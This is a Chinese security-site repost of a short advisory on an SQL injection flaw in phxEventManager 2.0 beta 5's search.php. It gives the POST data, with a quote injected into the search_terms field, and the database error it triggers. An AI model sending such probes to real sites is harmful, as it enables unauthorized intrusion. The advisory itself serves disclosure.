phxEventManager 2.0 beta 5 search.php search_terms SQL注射及-自学php网

phxEventManager 2.0 beta 5 search.php search_terms SQL注射及

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 标题: phxEventManager 2.0 beta 5 search.php search_terms SQLInjection Vulnerability作者: skysbsb下载地址: http://sourceforge.net/projects/phxeventmanager/测试平台: Apache/*nix实力地址: ......

标题: phxEventManager 2.0 beta 5 search.php search_terms SQL
Injection Vulnerability
作者: skysbsb
下载地址: http://sourceforge.net/projects/phxeventmanager/
测试平台: Apache/*nix
实力地址: http://www.2cto.com /path_to_pem/search.php?
POSTDATA:
datasubmit=1&searchtype=events&s_event_names=on&s_event_descriptions=on&s_event_presenters=on&s_event_contacts=on&search_terms='
Result:
MDB2 Error: syntax error, _doQuery: [Error message: Could not execute
statement] [Last executed query: SELECT * FROM pem_entries as e, pem_dates
as d WHERE e.id = d.entry_id AND () AND e.entry_status != 2 AND
d.date_status != 2 AND (e.entry_visible_to_public = 1 AND
d.date_visible_to_public = 1) AND (e.entry_status != 0 AND d.date_status !=
0) AND d.when_begin >= DATE_SUB(CURDATE(),INTERVAL 1 YEAR) ] [Native code:
1064] [Native message: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ') AND e.entry_status != 2 AND d.date_status != 2 AND
(e.entry_visible_to_public ' at line 1]

修复：进行过滤

一个防注入的小白错误-千博企业程序 - 网站安全

Endian UTM Firewall v2.4.x & v2.5.0多个网页缺陷及修

子栏目

phxEventManager 2.0 beta 5 search.php search_terms SQL注射及

最新评论

添加评论

更多文章推荐

添加评论